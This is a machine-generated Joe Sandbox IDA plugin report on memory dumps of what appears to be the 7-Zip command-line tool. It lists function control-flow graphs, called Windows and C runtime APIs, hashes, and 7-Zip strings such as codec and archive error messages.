                                                                                                                                                                                                        • String ID: Errors: $Warnings:
                                                                                                                                                                                                        • API String ID: 437615013-2345102087
                                                                                                                                                                                                        • Opcode ID: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                        • Instruction ID: 68664b364de158fc4f79293aeea0ca7bfb0b500bbdf2c342525d1ede85ea0028
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F65184623569C081CD30EB25E8913AEB3E1F782791F4541E2DE9D57759DF38C88A8B41

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3188 b783c8-b7841d call b56570 call b531c0 call b58624 3195 b78482 3188->3195 3196 b7841f-b7844c call b531c0 call b586dc 3188->3196 3197 b78485-b78489 3195->3197 3196->3195 3208 b7844e-b7847b call b531c0 call b586dc 3196->3208 3199 b7848b-b78498 free 3197->3199 3200 b78499-b7849d 3197->3200 3199->3200 3202 b7849f-b784ac free 3200->3202 3203 b784ad-b784b1 3200->3203 3202->3203 3205 b784b3-b784b8 free 3203->3205 3206 b784bd-b784c0 3203->3206 3205->3206 3209 b784c6-b784ee call b53208 call b78290 3206->3209 3210 b785ef-b78607 call b53314 free 3206->3210 3208->3195 3224 b7847d-b78480 3208->3224 3222 b784f0-b78516 call b53314 free * 2 3209->3222 3223 b7851b-b78538 call b78290 3209->3223 3219 b7860a-b78611 3210->3219 3222->3219 3229 b78565-b7857b call b78290 3223->3229 3230 b7853a-b78560 call b53314 free * 2 3223->3230 3224->3197 3235 b785a5-b785bb call b78290 3229->3235 3236 b7857d-b785a3 call b53314 free * 2 3229->3236 3230->3219 3241 b785e5-b785ea free 3235->3241 3242 b785bd-b785e3 call b53314 free * 2 3235->3242 3236->3219 3241->3210 3242->3219
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                        • API String ID: 1534225298-3804457719
                                                                                                                                                                                                        • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                        • Instruction ID: 53c628bb2d1d986c5890e710c5172ef5cd88eabdfe06ef8416e93cf77ca90e0a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4251C82234690550CE20EF25E45535E67A0E7C2BE5F4451D2BE6E57779CF28C68ECB04

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3245 b7ab74-b7aba4 3246 b7aba6 3245->3246 3247 b7abd3-b7abf5 3245->3247 3250 b7abaa-b7abbc 3246->3250 3248 b7ae31-b7ae78 call b783c8 call b531c0 call b7a7fc free 3247->3248 3249 b7abfb 3247->3249 3268 b7ae7f-b7ae87 3248->3268 3269 b7ae7a 3248->3269 3251 b7ac02-b7acba call b53208 call b53518 call b53208 * 2 3249->3251 3253 b7abce-b7abd1 3250->3253 3254 b7abbe-b7abc9 call b794a8 free 3250->3254 3278 b7acc6-b7accd 3251->3278 3279 b7acbc-b7acc1 call b53518 3251->3279 3253->3247 3253->3250 3254->3253 3272 b7ae99-b7aeca call b531c0 call b7a9fc free 3268->3272 3273 b7ae89-b7ae94 call b5339c 3268->3273 3271 b7af7a-b7af99 free 3269->3271 3288 b7aed1-b7aeee call b531c0 call b7a9fc 3272->3288 3289 b7aecc 3272->3289 3273->3272 3282 b7accf-b7acd4 call b53518 3278->3282 3283 b7acd9-b7ad35 call b79d98 free * 2 3278->3283 3279->3278 3282->3283 3290 b7ad37-b7ad4c call b7a034 3283->3290 3291 b7ad51-b7ad61 call b52130 3283->3291 3302 b7aef3-b7af02 free 3288->3302 3289->3271 3299 b7addd-b7adf2 call b52130 3290->3299 3300 b7ad63-b7ad6a 3291->3300 3301 b7ad6c 3291->3301 3311 b7adf4-b7ae01 call b79af0 3299->3311 3312 b7ae03 3299->3312 3304 b7ad6f-b7ad8b call b5b8f0 3300->3304 3301->3304 3305 b7af06-b7af10 3302->3305 3306 b7af04 3302->3306 3321 b7adbd-b7adc0 3304->3321 3322 b7ad8d-b7ad93 3304->3322 3309 b7af12-b7af16 3305->3309 3310 b7af18-b7af1b 3305->3310 3306->3271 3314 b7af2a-b7af2e 3309->3314 3310->3314 3315 b7af1d-b7af24 3310->3315 3316 b7ae06-b7ae2b call b5b8f0 call b794a8 3311->3316 3312->3316 3318 b7af77 3314->3318 3319 b7af30-b7af36 3314->3319 3315->3314 3317 b7af26 3315->3317 3316->3248 3316->3251 3317->3314 3318->3271 3319->3318 3326 b7af38 3319->3326 3327 b7adc2-b7add3 memmove 3321->3327 3328 b7adda 3321->3328 3323 b7ad95-b7ad9a free 3322->3323 3324 b7ada1-b7adac 3322->3324 3323->3324 3330 b7add5-b7add8 3324->3330 3331 b7adae-b7adb9 call b52130 3324->3331 3333 b7af3b-b7af5a GetProcAddress 3326->3333 3327->3299 3328->3299 3330->3299 3331->3321 3336 b7af66-b7af6f 3333->3336 3337 b7af5c-b7af64 3333->3337 3336->3333 3340 b7af71 3336->3340 3337->3336 3342 b7af73-b7af75 3337->3342 3340->3318 3342->3271
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7ABC9
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7ACF3
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7ACFE
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7AD95
                                                                                                                                                                                                        • memmove.MSVCRT(?), ref: 00B7ADCB
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7AE70
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7AF7F
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794DB
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794E3
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794F0
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7951C
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B79525
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7952D
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7953A
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7AEC2
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                          • Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AA95
                                                                                                                                                                                                          • Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AAC5
                                                                                                                                                                                                          • Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AAD2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7AEFA
                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00B7AF4D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove$AddressProc
                                                                                                                                                                                                        • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                        • API String ID: 4053071709-2499791885
                                                                                                                                                                                                        • Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                        • Instruction ID: 1941e47cc1f6c83a284f0b96bd247456dd0c804047794da332595b491eb0c4f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB1C066205AC092CB70EB21E4903AFB7E0F3C1788F508192EB9E47B25DF78C959D702

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3343 b91850-b91886 EnterCriticalSection 3344 b91888-b9188e call b9b1c8 3343->3344 3345 b918b1-b918bb 3343->3345 3349 b91893-b918ac 3344->3349 3347 b918bd call b522e4 3345->3347 3348 b918c2-b918c4 3345->3348 3347->3348 3351 b918ca-b918d2 3348->3351 3352 b91991-b9199e 3348->3352 3349->3345 3355 b9191a-b9192b 3351->3355 3356 b918d4-b918da 3351->3356 3353 b91a4e-b91a57 LeaveCriticalSection 3352->3353 3354 b919a4-b919a7 3352->3354 3357 b91a59-b91a62 3353->3357 3354->3353 3358 b919ad-b919b7 3354->3358 3359 b9196a-b91974 3355->3359 3360 b9192d-b9193a call b52300 3355->3360 3356->3355 3361 b918dc-b918e2 3356->3361 3362 b919b9-b919d7 call b52300 fputs 3358->3362 3363 b91a31-b91a4c LeaveCriticalSection 3358->3363 3359->3363 3365 b9197a-b91981 3359->3365 3360->3359 3374 b9193c-b91965 fputs call b526a0 call b52300 3360->3374 3366 b918ed 3361->3366 3367 b918e4-b918eb 3361->3367 3378 b919d9-b919f0 fputs 3362->3378 3379 b919f2-b91a14 call b56618 call b52320 free 3362->3379 3363->3357 3365->3363 3371 b91987-b9198c call b522e4 3365->3371 3368 b918f4-b918fe 3366->3368 3367->3368 3368->3359 3372 b91900-b91913 fputs call b52300 3368->3372 3371->3363 3381 b91918 3372->3381 3374->3359 3382 b91a19-b91a2c call b52300 call b522e4 3378->3382 3379->3382 3381->3359 3382->3363
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00B91877
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9190A
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B91A44
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9194D
                                                                                                                                                                                                          • Part of subcall function 00B526A0: fputs.MSVCRT ref: 00B526C1
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B919CB
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B919EA
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B91A51
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        • free.MSVCRT ref: 00B91A14
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                        • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                        • API String ID: 676172275-580504279
                                                                                                                                                                                                        • Opcode ID: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                        • Instruction ID: 99e398791b5d8b3d1fdd0a4f34587023cbfacae34bac250d750e29d3fbebf575
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D518E22305A82A6DF1DDF29D9A03AD73A0F785B90F4445B2DF2E47251DF38D8A9E304

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3392 b738e8-b73977 call b71700 call b7373c memmove 3397 b73992-b739a5 3392->3397 3398 b73979-b7398d call b73864 free 3392->3398 3400 b73a30-b73a3d call b73864 3397->3400 3401 b739ab 3397->3401 3405 b73cb6-b73cc9 3398->3405 3410 b73a65-b73a77 3400->3410 3411 b73a3f-b73a64 call b702a0 _CxxThrowException 3400->3411 3404 b739ae-b739c2 3401->3404 3407 b739c4-b739ec call b709e0 call b52130 3404->3407 3408 b73a1d-b73a25 3404->3408 3424 b739ee-b739f9 call b53314 3407->3424 3425 b739fb 3407->3425 3408->3404 3409 b73a27-b73a2b 3408->3409 3409->3400 3415 b73ae1-b73b27 call b85f5c call b713e8 * 2 3410->3415 3416 b73a79-b73a7c 3410->3416 3411->3410 3439 b73b2d-b73b30 3415->3439 3440 b73c2a-b73c46 free 3415->3440 3420 b73a7e-b73aac call b53208 call b56e10 call b52130 3416->3420 3443 b73aae-b73abb call b53314 3420->3443 3444 b73abd 3420->3444 3430 b739fe-b73a16 call b5b8f0 free 3424->3430 3425->3430 3430->3408 3442 b73b33-b73b56 call b52130 3439->3442 3445 b73c76-b73c84 free 3440->3445 3446 b73c48 3440->3446 3460 b73b68 3442->3460 3461 b73b58-b73b66 call b53314 3442->3461 3449 b73ac0-b73adf call b5b8f0 free 3443->3449 3444->3449 3451 b73c88-b73c95 3445->3451 3450 b73c4c-b73c5f 3446->3450 3449->3415 3449->3420 3457 b73c71-b73c74 3450->3457 3458 b73c61-b73c6c free * 2 3450->3458 3452 b73ca7-b73caa 3451->3452 3453 b73c97-b73ca2 free * 2 3451->3453 3452->3451 3459 b73cac-b73cb4 free 3452->3459 3453->3452 3457->3445 3457->3450 3458->3457 3459->3405 3464 b73b6b-b73ba1 call b52130 3460->3464 3461->3464 3468 b73bb3 3464->3468 3469 b73ba3-b73bb1 call b53314 3464->3469 3470 b73bb6-b73bc6 3468->3470 3469->3470 3472 b73be4-b73bf2 3470->3472 3473 b73bc8-b73be2 call b54338 3470->3473 3472->3442 3476 b73bf8 3472->3476 3473->3472 3478 b73bfa-b73c29 call b702a0 _CxxThrowException 3473->3478 3476->3440 3478->3440
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B7373C: free.MSVCRT ref: 00B737FB
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B7396F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B73986
                                                                                                                                                                                                        • free.MSVCRT ref: 00B73A11
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B73A5F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B73AD3
                                                                                                                                                                                                          • Part of subcall function 00B73864: free.MSVCRT ref: 00B73877
                                                                                                                                                                                                          • Part of subcall function 00B73864: free.MSVCRT ref: 00B73892
                                                                                                                                                                                                          • Part of subcall function 00B73864: free.MSVCRT ref: 00B7389B
                                                                                                                                                                                                          • Part of subcall function 00B73864: free.MSVCRT ref: 00B738C6
                                                                                                                                                                                                          • Part of subcall function 00B73864: free.MSVCRT ref: 00B738CE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                        • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                        • API String ID: 3934437811-2067063536
                                                                                                                                                                                                        • Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                        • Instruction ID: 9bfb21faa52b19e1bca5216405c7852b4783fad8754b47fdde5ecf60cbb9509c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62A17273315B8492CA20EB25E49165EB3E1F785F80F409592EF9E17B29DF38C946DB00

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3481 b842a2-b842c0 3483 b842c2-b842d0 3481->3483 3484 b842d5-b842d8 3481->3484 3483->3484 3485 b842da 3484->3485 3486 b842e0-b843ab call b740c4 memmove call b53404 call b83a20 3484->3486 3485->3486 3494 b845d8-b8468f call b53404 * 3 free * 2 call b7419c 3486->3494 3495 b843b1-b843b3 3486->3495 3535 b84698-b846a0 3494->3535 3536 b84691-b84697 3494->3536 3497 b843b9-b843d7 call b7c684 3495->3497 3498 b846c5-b846f4 free * 2 call b7419c 3495->3498 3508 b84728-b84757 free * 2 call b7419c 3497->3508 3509 b843dd-b843ef call b52130 3497->3509 3506 b846fd-b84705 3498->3506 3507 b846f6-b846fc 3498->3507 3513 b8470e-b84719 3506->3513 3514 b84707-b8470d 3506->3514 3507->3506 3522 b84759-b8475f 3508->3522 3523 b84760-b84768 3508->3523 3525 b843f1-b84401 call b7caac 3509->3525 3526 b84403 3509->3526 3515 b8471b 3513->3515 3516 b84721-b84723 3513->3516 3514->3513 3515->3516 3521 b847fe-b84811 3516->3521 3522->3523 3530 b8476a-b84770 3523->3530 3531 b84771-b8477c 3523->3531 3528 b84406-b84441 call b5b8f0 free * 2 call b7419c 3525->3528 3526->3528 3551 b8444a-b84452 3528->3551 3552 b84443-b84449 3528->3552 3530->3531 3537 b8477e 3531->3537 3538 b84784-b84786 3531->3538 3543 b846a9-b846b4 3535->3543 3544 b846a2-b846a8 3535->3544 3536->3535 3537->3538 3538->3521 3540 b847f2-b847fb 3538->3540 3540->3521 3543->3540 3545 b846ba-b846c0 3543->3545 3544->3543 3545->3540 3553 b8445b-b8446c 3551->3553 3554 b84454-b8445a 3551->3554 3552->3551 3556 b83fa9-b84033 memmove 3553->3556 3557 b84472-b84478 3553->3557 3554->3553 3561 b84054-b84072 memmove 3556->3561 3562 b84035-b84052 memmove 3556->3562 3557->3556 3561->3540 3563 b84078-b840e9 memmove call b7c0fc call b53404 * 2 call b83d58 3561->3563 3562->3563 3573 b840ee-b840f2 3563->3573 3574 b840f8-b8410a call b52130 3573->3574 3575 b8447d-b84480 3573->3575 3583 b8410c-b8411c call b7caac 3574->3583 3584 b8411e 3574->3584 3576 b8450c-b8451b call b7419c 3575->3576 3577 b84486-b8450b call b53404 * 3 3575->3577 3576->3521 3577->3576 3588 b84121-b8413a call b5b8f0 call b7419c 3583->3588 3584->3588
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-3916222277
                                                                                                                                                                                                        • Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                        • Instruction ID: 3a91ea3a2d467df25c42952ff45a228df118aadbd425058d958e3c3c34935312
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01D14E37209AC596CB21EF25E09029EBBA0F7D6B84F445096DB8E47B29DF7CC548CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressProc$memmove
                                                                                                                                                                                                        • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                        • API String ID: 2879976980-73314117
                                                                                                                                                                                                        • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                        • Instruction ID: 839ebef02ada5f0eb7d571777fcdac50f9bfad5c349f3172e291236e0ddd0e5c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D414876315A4296DB20DF25F8807ADB3B1F784794F408526EB9E87B64DF78C949CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B91CF9
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B91DEE
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B91F07
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B91F5C
                                                                                                                                                                                                          • Part of subcall function 00B9171C: fputs.MSVCRT ref: 00B91744
                                                                                                                                                                                                          • Part of subcall function 00B9171C: fputs.MSVCRT ref: 00B91758
                                                                                                                                                                                                          • Part of subcall function 00B9171C: free.MSVCRT ref: 00B9176B
                                                                                                                                                                                                          • Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
                                                                                                                                                                                                          • Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                        • free.MSVCRT ref: 00B91F86
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                        • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                        • API String ID: 2553544393-24972044
                                                                                                                                                                                                        • Opcode ID: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                        • Instruction ID: 7d1dd2a2d46da232a4ff8ce54642b8788a342cae49e3dac371975a7043040700
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDA1BF76305AC6AACE29EF36D5903AE73A0F745B80F4844B6DF5E07611DF68D8A8D310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowfputs
                                                                                                                                                                                                        • String ID: Decoding ERROR
                                                                                                                                                                                                        • API String ID: 117389134-2585761706
